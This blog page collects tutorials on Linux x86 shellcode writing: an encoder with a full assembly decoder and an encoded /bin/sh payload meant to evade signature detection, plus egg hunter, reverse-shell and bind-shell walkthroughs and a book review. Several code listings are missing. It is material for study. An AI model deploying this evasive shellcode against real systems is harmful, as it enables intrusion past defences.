Adrian Citu's Blog

Linux

Goal

Very often the shellcode authors will try to obfuscate the shellcode in order to bypass the ids/ips or the anti-viruses. This kind of shellcode is often call an “encoded shellcode”. The goal of this ticket is to propose an (rather simple) encoding schema and the decoding part written in assembler.

What is an encoded shellcode

An encoded shellcode is a shellcode that have the payload encoded in order to escape the signature based detection. To work correctly the shellcode must initially decode the payload and then execute it. For a very basic example you can check the A Poor Man’s Shellcode Encoder / Decoder video.

(My) custom encoder

The encoding schema that I propose is the following one:

the payload is split in different blocks of random size between 1 and 9 bytes.

the first octet of each block represents the size of the original block.

the last character of the last block is a special character represented a terminal (0xff).

Supposing that the payload is something like:

0xaa,0xbb,0xcc,0xdd,0xee

One possible encoding version could be:

0x02,0xaa,0xbb,0x01,0xcc,0x03,0xdd,0xee,0xff

or

0x04,0xaa,0xbb,0xcc,0xdd,0x02,0xee,0xff

or

0x09,0xaa,0xbb,0xcc,0xdd,0xee,0xff

If you want to play with this encoding schema you can use the Random-Insertion-Encoder.py program that will write to the console the encoded shellcode for a specific shellcode.

(My) custom decoder

So, initially the payload will be encoded (with the custom shema) and when the shellcode is executed, in order to have a valid payload, the decoder should be executed. The decoder will decode the payload and then pass the execution to the payload.

The first problem that the decoder should solve is to find the memory address of the encoded payload. In order to do this, we will use the “Jump Call Pop” mechanism explained in the Introduction to Linux shellcode writing (Part 2) (paragraph 5.1 ).

A few words before showing you the code of the decoder. The decoder basically moves bytes from the right toward the left and skip the first byte of each block until the terminal byte is found. For the move of the bytes the lodsb and stosbinstructions are used. These instructions are using the ESI (lodsb) and EDI (stosb) registers, so you can see ESI as a source register and EDI as a destination register.

The DL register is used as block bytes counter and the CL register contains the content of the first byte of each block. So, in order to know if all the bytes of a block had been copied a comparison between DL and CL is done.

A special care should be take before the ESI register is incremented; either manually or automatically by the lodsb instruction. A check should be done if the ESI points to the terminator byte and stop the copy otherwise the decoder will try to read memory locations that do not have access (and the program will stop with a core dumped exception).

So, here is the code of the decoder:

global _start
section .text
_start:
jmp short call_shellcode
decoder:
;get the adress of the shellcode
pop esi
;allign edi and esi
lea edi, [esi]
handle_next_block:
;check that the esi do not point
;to the terminator byte
xor ecx,ecx
mov cl, byte[esi]
mov bl , cl
xor bl, 0xff
;if esi points to terminator byte
;then execute the shellcode
jz short EncodedShellcode
;otherwise then ship next byte
;because it's the first byte
;of the block and it contains
;the number of bytes that
;the block contains.
inc esi
;dl it is used to count the
;number of bytes from a block
;already copied
xor edx, edx
handle_next_byte:
;check that the esi do not point
;to the terminator byte
mov bl, [esi]
xor bl, 0xff
;if esi points toterminator byte
;then execute the shellcode
jz short EncodedShellcode
;otherwise copy the byte pointed by
;esi to the location pointed by edi;
;esi is automatically incremented by
;the lodsb and edi by stosb
lodsb
stosb
;one more byte of the block had been copied
;so increment the counter
inc dl
;check that all the bytes of the block
;have been copied;
;cl contains the first byte of the block
;representing the number of bytes of the
;block and dl contains the number of
;block bytes already copied
cmp cl, dl
;if not zero then not all the block bytes
;have been copied
jnz handle_next_byte
;otherwise go to the next block
jmp handle_next_block
call_shellcode:
call decoder
EncodedShellcode: db 0x06,0x31,0xc0,0x50,0x68,0x2f,0x2f,0x09,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x01,0x50,0x07,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0x01,0xcd,0x09,0x80,0xff

Goal

The goal of this ticket is to write an egg hunter shellcode. An egg hunter is a piece of code that when is executed is looking for another piece of code (usually bigger) called the egg and it passes the execution to the egg. This technique is usually used when the space of executing shellcode is limited (the available space is less than the egg size) and it is possible to inject the egg in another memory location. Because the egg is injected in a non static memory location the egg must start with an egg tag in order to be recognized by the egg hunter.

1. How to test the shellcode

Maybe it will look odd but I will start by presenting the program that it will be used to test the egg hunter. The test program is a modified version of the shelcode.c used in the previous tickets.

We start by defining the egg tag, the egg hunter and the egg; the egg is prefixed twice with the egg tag in order to be recognized by the egg hunter. The main program it will just pass the execution to the egg hunter that will search for the egg (which is somewhere in the memory space of the program) and then it will pass the execution to the egg.

Usually the egg tag is eight bytes and the reason the egg tag repeats itself is because it allows the egg hunter to be more optimized for size so it can search for a single tag that has the same four byte values, one right after the other. This eight byte version of the egg tag tends to allow for enough uniqueness that it can be easily selected without running any high risk of a collision.

2 Implementation

2.1 Define the egg tag

Defining the egg tag is quite easy; finally it’s up to you to choose a rather unique word. In our case the egg tag is egg1. In order to be used by the egg hunter the tag must be transformed in HEX. I just crafted a small script: fromStringToAscii.sh that will transform the input from char to ASCII equivalent and then to HEX value. So in our case the egg tag value will be 0x31676765.

2.2 Implement the egg hunter

What the egg hunter implementation should do, is firstly find the addressable space allocated to the host process( the process in which the egg hunter is embedded) then, search inside this addressable space for the egg and finally pass the execution to the egg.

On Linux this behavior can be achieved using the access (2) system call. The egg hunter will call systematically access system callin order to find thememory pages that the host process have access and once one accessible page is found, then it looks for the egg. Here is the implementation code:

3.Putting all together

Now, we have all the missing pieces so we could try to put them together. As egg I used a the reverse connection shellcode from the How to write a reverse connection shellcode. The final result it is something like:

Goal

The goal of this ticket is to write a shellcode that makes a connection from the hacked system to a different system where it can be cached by different network tools like net cat

In order to complete this task I will try to follow the workflow that I presented in my previous tickets concerning shellcode writing (Introduction to Linux shellcode writing, part 1 and part 2) meaning that i will first write a C version, then I will try to translate the C version in assembler trying to avoid the common shellcode writing pitfalls like null bytes problem and the addressing problem.

For all the others calls (dup2, execve and close) the system call numbers are:

#define __NR_dup2 63
#define __NR_execve 11
#define __NR_close 6

The second step is to take a look to the man pages of each of the functions used to check the needed parameters for each of the functions.

2.2 Implement the assembler version for each of the functions from the C program

Once we have all the necessary informations for the functions used in the C version (the system call numbers and the parameters) the next step is to write the assembler version of the C program.

The assembler version of the shellcode is strongly inspired from the shellcode of How to write a port-biding shellcode, I just removed the functions that were not needed for the actual shell and added one missing function (the ConnectSocket function).

3.1 Make the external IP address and port number as a parameter

In the actual code the external IP address and the port number are static (it’s the same for every execution). We would like to make these 2 things parametrisable . First we must find the HEX value of the instructions representing the IP address and the port number. Using the objdump with the following parameters:

Last point about these two parameters(IP address and port number); these parameters are pushed on the stack in HEX version and due to the Little Endian architecture of the Intel processors the parameters should be pushed in reverse order. For example if you want to push decimal 12345 (0x3039), you should push 54321 (0x3930).

Goal

The goal of this ticket is to write a shellcode that will open a socket on a specific port and executes a shell when someone connects to the specific port.

In order to complete this task I will try to follow the workflow that I presented in my previous tickets concerning shellcode writing (Introduction to Linux shellcode writing, part 1 and part 2) meaning that i will first write a C version, then I will try to translate the C version in assembler trying to avoid the common shellcode writing pitfalls like null bytes problem and the addressing problem.

1. The C version of the shellcode

The following listing represents a minimal version (no error checking is done) of a port-binding program. Basically the program is doing the following actions:

create a socket

binds the socket to an address and port

listen for the clients

accept a client connection

redirect the stdin, stdout and stderr to the new socket open by the client

For all the others calls (dup2, execve and close) the system call numbers are:

#define __NR_dup2 63
#define __NR_execve 11
#define __NR_close 6

The second step is to take a look to the man pages of each of the functions used to check the needed parameters for each of the functions.

2.2 Implement the assembler version for each of the functions from the C program

Once we have all the necessary informations for the functions used in the C version (the system call numbers and the parameters) the next step is to write the assembler version of the C program.

For the assembler implementation I decided to encapsulate each of the system calls in different functions for (code) clarity reasons even if the shellcode would be bigger. Initially my plan was to have something like this in the _start section of the program:

Unfortunately, even if the original implementation worked flawlessly, the embarked shellcode didn’t worked and I was not able to find the root cause. So, the working implementation is still contains different assembler functions for each C function but each function calls the following one:

3.1 Make the port number as a parameter

In the actual code the port number is static (it’s the same for every execution, 0xffff). We would like to make it as a parameter. First we must find the HEX value of the instruction representing the port number. Using the objdump with the following parameters:

objdump -d SocketServer -M intel | grep ffff

and we will find:

8048080: 66 6a ff pushw 0xffff

So, in our binary representation of the shellcode we could make a constant reprenting the port number something like:

Last point about the port number; the port number is pushed on the stack in HEX version and due to the Little Endian architecture of the Intel processors the port number should be pushed in reverse order. For example if you want to push decimal 12345 (0x3039), you should push 54321 (0x3930). You can use this small sh script to compute the port number in “good” order: https://github.com/AdrianCitu/slae/blob/master/slae1/portCalc.sh

All the source codes explained presented in this ticket can be found here: gitHub.

3. Recap

In the previous ticket we created a dummy shellcode firstly in C language and then in the assembler language; we tested the dummy shellcode but we’ve seen that the execution was failing. In this ticket we will try to fix the dummy shellcode problems and hopefully we will be able to execute it successfully.

The 2 most common pitfalls that the shellcode writers must address in their code are: the null bytes problem and the addressing problem.

4.The null bytes problem

Very often the shellcode is injected in the vulnerable program using ( C )string functions like strcpy, read, so the shellcode content will be treated as an array of char values terminated by a special NULL character (value ‘\0), so when the shellcode contains a NULL byte, the byte will be interpreted as a string terminator and the execution will stop.

In order to fix the problem, you should not use the NULL byte in the shellcode, but firstly you have to find it. The easiest way to sport it is to use the objdump tool.

5 The addressing problem

The addressing problem is linked to the datas that are used by the shellcode; in our case it is the string “Hello World !”. As you can see in the assembler code, the bx register will contain the memory address of the message to write on the screen:

mov ecx, message

and will be transformed by the compiler in the following instruction:

mov ecx,0x80490a0

where 0x80490a0 is a (statically computed by the compiler) memory location. When the shellcode will be executed the memory location will certainly contains something else. This is the reason why when we executed our shellcode, (see the last screenshot from the previous ticket ) the output was some strange characters and not the expected string.

To summarize, the shellcode must dynamically compute the memory addresses of all his datas and to do this there are 2 ways: the jump call pop technique and/or push the datas on the stack.

5.1 Compute memory location using “Jump Call Pop”

In the case of the Intel call instruction, when the call is …called , the address of the next instruction is pushed to the stack (ESP register). So, the trick is to position the data that you want to compute the address after a call instruction and then get the address of the data from the stack. Here is some pseudocode:

funtionThatWillUseData:
;ESP will contain the address of the data
pop eax
;now the eax will contain the address of the data
call funtionThatWillUseData
data: db "blabla", 0xA

Now, we will rewrite our dummy shellcode to compute the address of the “Hello World” string. Here is the new version of the dummy shellcode:

At this moment we fixed the all the problems, so the shellcode should execute successfully; If you want to know how to test it, go to the “Test your shellcode” paragraph from my previous ticket.

5.2 Compute memory location by pushing the data on the stack

The second technique (that will make your code smaller that the previous one) is to push directly on the stack the data that you want to use in your shellcode. Now if your data is longer than 4 bytes, then you can split your data in multiple chunks and push it; in our case we will split the data in 4 chunks.

Another point that is worth mentioning is that the different chunks will be pushed on the stack in the reverse order (in HEX) because the stack is growing from “up” to “down” (from upper memory addresses to lower memory addressees) and (to make the things more complex) the order on the letters in each chunk is reversed because of the Intel Little Endian architecture. So, finally the data on the stack will look like this :

Introduction

This is very brief and basic list of steps to follow if you want to write a shellcode under Linux operating system.

1. Craft the shellcode

The first step and by far the most important one is to find a vulnerability and to write the shellcode that’s exploiting the vulnerability. In this tutorial we will write a dummy shellcode represented by the “Hello World” program. The easiest way to write a shellcode is first to write it in the C language and then in order to have a more compact version, to translate it or to rewrite the shellcode in assembler.

1.1 Craft the shellcode in C

The main goal of writing the shellode in C is to have first working version of the exploit without (yet) bothering about the constraints of the shellcode execution (see later the chapter about the validity of the shelcode). In our case, the C version of our dummy shellcode is the following one:

After the compilation (gcc -o hello hello.c) we can take a look at the generated assembly code (objdump -d ./hello -M intel) and we would see that for a very small C program the assembly version is quite long (this is mainly due to the C preprocessor); it’s 228 lines length ( objdump -d ./hello -M intel | wc -l).

Now, we would like to “translate” the C version of our shellcode in the assembly version and the most straightforward way is by finding the system calls that hat are made by the C version of the shellcode. In some cases the system calls are quite obvious (the case of the write function) but sometimes it’s not so easy to guess. The tool that will give to you the system calls is the strace. In our case the strace ./hello will have the following output (the parts that are interesting for us are in bold):

1.2 Craft the shellcode in assembler

Now that we have the system calls it is possible to get some infos like the parameters needed by the each system call (using man) and the system calls numbers (all the system calls names and number are in /usr/include/i386-linux-gnu/asm/unistd_32.h file).

So, the number of the write call is 4 (using cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep write) and the parameters are the following one (using man 2 write):

ssize_t write(int fd, const void *buf, size_t count);

For the exit system call the number is 1 and the call parameter are :

void _exit(int status);

Having all the needed information, we can write the assembler version of our dummy shellcode.

In order to call system calls in assembler, you must fill the tax register with the system call number and fill the register ebx, ecx, edx for every parameter that the system call need.

For example the write have 3 parameters so the tax register will be filled with 0x4 (the system call number), ebx register will contain the file descriptor (1 for sysout), ecx register will contains the address of the string to print, and edx register will contain the length of the string to print (if you don’t have any knowledge of linux assembler you can take a look to this very good introduction Assembly Language and Shellcoding on Linux ):

The above lines are simulating a vulnerable program by overwriting the return address of the main() function with the address of the shellcode, in order to execute the shellcode instructions upon exit from main().

The HEX version of the shellcode can be obtained from the binary file using the objdump utility and a much smarter version of the command can be found on commandlinefu.com

Lets compute the HEX version of our dummy shellcode and then test it with our test program.

The HEX version of our assembler version of the dummy shellcode is the following one:

Chapter 0x100 Introduction

Very short chapter (2 pages and 1/2) in which the author gives his definition of a hacker; person that find unusual solutions to any kind of problems, not only technical problems. The author also expresses very clearly the goal of his book: “The intent of this book is to teach you the true spirit of hacking. We will look at various hacking techniques, from the past to the present, dissecting them to learn how and why they work”.

Chapter 0x200 Programming

The chapter is an introduction to C programming language and to assembler for Intel 8086 processors. The entry level is very low, it starts by explaining the use of pseudo-code and then very gradually introduces many of the structures of the C language: variables, variables scopes, control structures, structs, functions, pointers (don’t expect to have a complete introduction to C or to find advanced material).

The chapter contains a lot of code examples very clearly explained using the GDB debugger. Since all the examples are running under Linux, the last part of the chapter contains some basics about the programming on Linux operating system like file permissions, uid, guid, setuid.

Chapter 0x300 Exploitation

This chapter it builds on the knowledge learned in the previous one and it’s dedicated to the buffer overflow exploits. The most part of the chapter treats the stack-based buffer overflow in great detail using gradual complexity examples. Overflow vulnerabilities on other memory segments are also presented, overflows on the heap and on the BSS.

The last part of the chapter is about format string exploits. Some of the string vulnerabilities use specific GNU C compiler structures (.dtors and .ctors). In almost all the examples, the author uses the GDB to explain the details of the vulnerabilities and of the exploits.

One negative remark is that in some of the exploits the author use shell codes without explaining how these shell codes have been crafted (on the other side an entire chapter is devoted to shell codes).

Chapter 0x400 Networking

This chapter is dedicated to the network hacking(s) and can be split in 3 parts. The first part is rather theoretical, the ISO OSI model is presented and some of the layers (data-link layer, network layer and transport layer) are explained in more depth.

The second part of the chapter is more practical; different network protocols are presented like ARP, ICMP, IP, TCP; the author explains the structure of the packets/datagrams for the protocols and the communication workflow between the hosts. On the programming side, the author makes a very good introduction to sockets in the C language.

The third part of the chapter is devoted to the hacks and is build on the top of the first two parts. For the package sniffing hacks the author introduces the libpcap library and for the package injection hacks the author uses the libnet library (ARP cache poisoning, SYN flooding, TCP RST hijacking). Other networking hacks are presented like different port scanning techniques, denial of service and the exploitation of a buffer overflow over the network. In most of the hacks the authors it’s crafting his own tools but sometimes he uses tools like nemesis and nmap.

This chapter is an introduction to the shellcode writing. In order to be injected in the target program the shelcode must be as compact as possible so the best suitable programing language for this task is the assembler language.

The chapter starts with an introduction to the assembler language for the Linux platform and continues with an example of a “hello word” shellcode. The goal of the “hello word” shellcode is to present different techniques to make the shellcode memory position-independent.

The rest of the chapter is dedicated to the shell-spawning(local) and port-binding (remote) shellcodes. In both cases the same presentation pattern is followed: the author starts with an example of the shellcode in C and then he translates and adapts (using GDB) the shellcode in assembler language.

Chapter 0x600 Countermeasures

The chapter is about the countermeasures that an intruder should apply in order to cover his tracks and became as undetectable as possible but also the countermeasures that a victim should apply in order reduce or nullify the effect of an attack.

The chapter is organized around the exploits of a very simple web server. The exploits proposed are increasingly complex and stealthier; from the “classical” port-biding shellcode that can be easily detected to more advanced camouflage techniques like forking the shellcode in order to keep the target program running, spoofing the logged IP address of the attacker or reusing an already open socket for the shellcode communication.

In the last part of the chapter some defensive countermeasures are presented like non-executable stack and randomized stack space. For each of this hardening countermeasures some partial workarounds are explained.

Chapter 0x700 Cryptology

The last chapter treats the cryptology, an subject very hard to explain to a neophyte. The first part of the chapter contains information about the algorithmic complexity, the symmetric and asymmetric encryption algorithms; the author brilliantly demystifies the operation of the RSA algorithm.

The last part of the chapter is quite outdated in present day (the book was edited in 2008) and is dedicated to the wireless 802.11 b encryption and to the weaknesses of the WEP.

Chapter 0x800 Conclusion

As for the introduction chapter, this chapter is very short and as in the first chapter the authors repeats that the hacking it’s state of mind and the hackers are people with innovative spirits.

(My) Conclusion

The book it’s a very good introduction to different technical topics of IT security. Even if the author tried to make the text easy for non-technical peoples (the chapter about programming starts with an explanation about pseudo-codes) some programming experience is required (ideally C/C++) in order to get the best of this book.